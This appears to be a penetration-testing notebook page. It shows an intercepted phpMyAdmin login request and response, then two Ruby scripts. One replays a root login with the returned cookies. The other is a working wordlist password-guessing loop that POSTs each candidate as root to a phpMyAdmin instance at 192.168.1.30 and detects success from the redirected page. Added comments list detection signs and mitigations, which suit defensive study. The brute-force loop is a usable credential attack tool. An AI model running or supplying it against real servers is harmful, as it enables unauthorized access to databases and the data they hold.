拦截的包
1 POST /phpMyAdmin/index.php HTTP/1.1
2 Content-Type: application/x-www-form-urlencoded
3 Connection: close
4 Host: xxx
5 User-Agent: http.rb/4.3.0
6 Content-Length: 92
7
8 pma_username=roofffffft&pma_password=fffroot&server=1&token=3b88f0df1d082083aae8b4cccba4055e #body
返回的包
1 HTTP/1.1 302 Found
2 Date: Fri, 20 Mar 2020 04:21:23 GMT
3 Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
4 X-Powered-By: PHP/5.4.45
5 Set-Cookie: phpMyAdmin=ma67sanr5modl1klbrm90fh462m1t5uv; path=/phpMyAdmin/; HttpOnly
6 Expires: Thu, 19 Nov 1981 08:52:00 GMT
7 Cache-Control: private, max-age=10800, pre-check=10800
8 Last-Modified: Sat, 27 Jul 2013 22:34:50 GMT
9 Set-Cookie: pma_lang=en; expires=Sun, 19-Apr-2020 04:21:23 GMT; path=/phpMyAdmin/; httponly
10 Set-Cookie: pma_mcrypt_iv=XZS6z83RRds%3D; expires=Sun, 19-Apr-2020 04:21:23 GMT; path=/phpMyAdmin/; httponly
11 Set-Cookie: pmaUser-1=RwEABrA%2FOuM59PM2bVoWgw%3D%3D; expires=Sun, 19-Apr-2020 04:21:23 GMT; path=/phpMyAdmin/; httponly
12 Set-Cookie: pmaPass-1=Z5V6d%2F6GK7w%3D; path=/phpMyAdmin/; httponly
13 Location: http://192.168.1.30/phpMyAdmin/index.php?lang=en&token=dba3ae0bc84dd82272d3b4d3837969a2&phpMyAdmin=ma67sanr5modl1klbrm90fh462m1t5uv #
14 Content-Length: 0
15 Connection: close
16 Content-Type: text/html
# Replays one phpMyAdmin cookie-auth login (user "root", a single hard-coded
# password) and then follows the redirect with the cookies the server set.
#
# Defender notes, based on the capture shown on this page:
#   * The client identifies itself as "http.rb/4.3.0" in the User-Agent header.
#   * Credentials travel in a cleartext form body over plain http://.
#   * The captured POST with wrong credentials was still answered with
#     "302 Found" plus pmaUser-1 / pmaPass-1 cookies, so the status code of the
#     POST alone does not tell a failed login from a successful one.
require 'http'

login_url = "http://xxx/phpMyAdmin/index.php"
form = "pma_username=root&pma_password=rfoot&server=1&token=3b88f0df1d082083aae8b4cccba4055e"
form_headers = { "Content-Type" => "application/x-www-form-urlencoded" }

# The POST is routed through a local proxy on 127.0.0.1:8080 so the exchange
# can be inspected; the follow-up GET below goes out directly.
response = HTTP.via('127.0.0.1', 8080).headers(form_headers).post(login_url, body: form)

# Read the Set-Cookie headers from the response. Only the first
# whitespace-delimited field of each header is kept, i.e. "name=value;" with
# its trailing semicolon; the attributes (path, expires, httponly) are dropped.
cookie = response.headers['Set-Cookie'].map do |set_cookie|
  name_value = set_cookie.split[0]
  puts name_value
  name_value
end

# Read the redirect target from the Location header. In the capture it carries
# the phpMyAdmin session id as a query parameter.
redirect_target = response.headers['Location']
puts redirect_target

puts cookie.join('')

# Each kept field already ends in ";", so joining without a separator still
# produces a usable Cookie header.
landing_page = HTTP.headers('Cookie' => cookie.join).get(redirect_target)
puts landing_page

# Alternative left disabled in the original:
# html = HTTP.via('127.0.0.1',8080).headers('Cookie' => cookie).get(url)
# puts html
从文件导出的脚本
# Password-guessing loop against a phpMyAdmin cookie-auth login form: one POST
# per line of p.txt, always for the user "root", each followed by a GET of the
# redirect target to see whether the login form is shown again.
#
# What this looks like from the server side (useful for detection):
#   * a run of POSTs to /phpMyAdmin/index.php from one client, each with
#     pma_username=root and the same token value,
#   * every POST immediately followed by a GET of the Location it returned,
#   * the User-Agent "http.rb/4.3.0" seen in the capture on this page.
# Mitigations worth checking on the phpMyAdmin side: do not expose the
# interface to untrusted networks, refuse root logins
# ($cfg['Servers'][$i]['AllowRoot'] = false), throttle or lock out repeated
# failures in front of the application, and serve it over HTTPS only.
require 'http'

# Disabled in the original: take the URL and the password file from ARGV.
# if ARGV.size != 2
#   puts 'phpmyadmin_login.rb http://www.test.com/phpmyadmin/index.php password_file.txt'
#   exit
# end
# url = ARGV[0]
# f = open ARGV[1]
# puts 'Check url: '+ARGV[0]   (original note: the file contains the URL)

url = "http://192.168.1.30/phpMyAdmin/index.php"
form_headers = { "Content-Type" => "application/x-www-form-urlencoded" }

# NOTE(review): the handle is never closed explicitly, as in the original.
wordlist = File.open('p.txt')

wordlist.each_line do |line|
  candidate = line.strip
  form = "pma_username=root&pma_password=#{candidate}&server=1&token=3b88f0df1d082083aae8b4cccba4055e"
  response = HTTP.headers(form_headers).post(url, body: form)

  # Keep only the "name=value" part of every Set-Cookie header.
  cookie = response.headers['Set-Cookie'].map { |set_cookie| set_cookie.split(';')[0] }
  redirect_target = response.headers['Location']

  puts "Check username and password : root #{candidate}"

  # In the capture on this page a wrong password was still answered with a
  # 302, so the result is judged from the page behind the redirect instead.
  landing_page = HTTP.headers('Cookie' => cookie.join(';')).get(redirect_target)

  # A page that still contains "Username:" is taken to be the login form.
  next if landing_page.to_s.match?(/Username:/)

  puts 'Login OK'
  break
end

# Debug leftovers disabled in the original:
# cookie.join ';'
# puts html.headers['Set-Cookie']
# puts cookie.join ''
# pp html.headers
# html = HTTP.via('127.0.0.1',8080).headers('Cookie' => cookie).get(url)
# puts html